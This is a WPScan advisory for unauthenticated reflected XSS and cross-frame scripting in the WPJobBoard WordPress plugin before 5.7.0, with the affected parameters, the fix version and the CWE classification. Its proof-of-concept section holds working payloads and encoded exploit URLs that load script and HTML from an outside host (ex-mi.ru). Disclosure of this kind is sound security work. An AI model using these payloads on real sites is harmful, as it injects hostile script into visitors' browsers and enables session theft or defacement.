WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WPJobBoard < 5.7.0 - Unauthenticated Reflected XSS & XFS

Description

Unauthenticated Reflected XSS & XFS vulnerabilities were discovered in the WPJobBoard plugin v5.6.4 for WordPress.

Vulnerable parameters: query, location.

Proof of Concept

Payloads:

"><script src="https://ex-mi.ru/payload/a2r.js"></script>

"><embed src="https://ex-mi.ru/payload/xfsii.html">

PoC Unauthenticated Reflected XSS:

https://example.com/resumes/advanced-search/?query=%22%3E%3Cscript+src%3D%22https%3A%2F%2Fex-mi.ru%2Fpayload%2Fa.js%22%3E%3C%2Fscript%3E&location=%22%3E%3Cscript+src%3D%22https%3A%2F%2Fex-mi.ru%2Fpayload%2Fa2r.js%22%3E%3C%2Fscript%3E&posted=1&results=1

PoC Unauthenticated XFS:

https://example.com/resumes/advanced-search/?query=%22%3E%3Cembed+src%3D%22https%3A%2F%2Fex-mi.ru%2Fpayload%2Fxfsii.html%22%3E&location=%22%3E%3Cembed+src%3D%22https%3A%2F%2Fex-mi.ru%2Fpayload%2Fxfsii.html%22%3E&posted=1&results=1

Affects Plugins

wpjobboard
Fixed in version 5.7.0

References

URL
https://ex-mi.ru/exploit/[2020-11-11]-[WordPress]-wpjobboard-plugin-v5.6.4.txt

YouTube Video

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Ex.Mi

Submitter

Ex.Mi

Submitter website
https://ex-mi.ru
Verified

Yes

WPVDB ID
4570ffb5-10ff-4dec-a0bd-99d5cd34655d

Timeline

Publicly Published

2020-11-25 (about 1 years ago)

Added

2020-11-25 (about 1 years ago)

Last Updated

2020-11-27 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin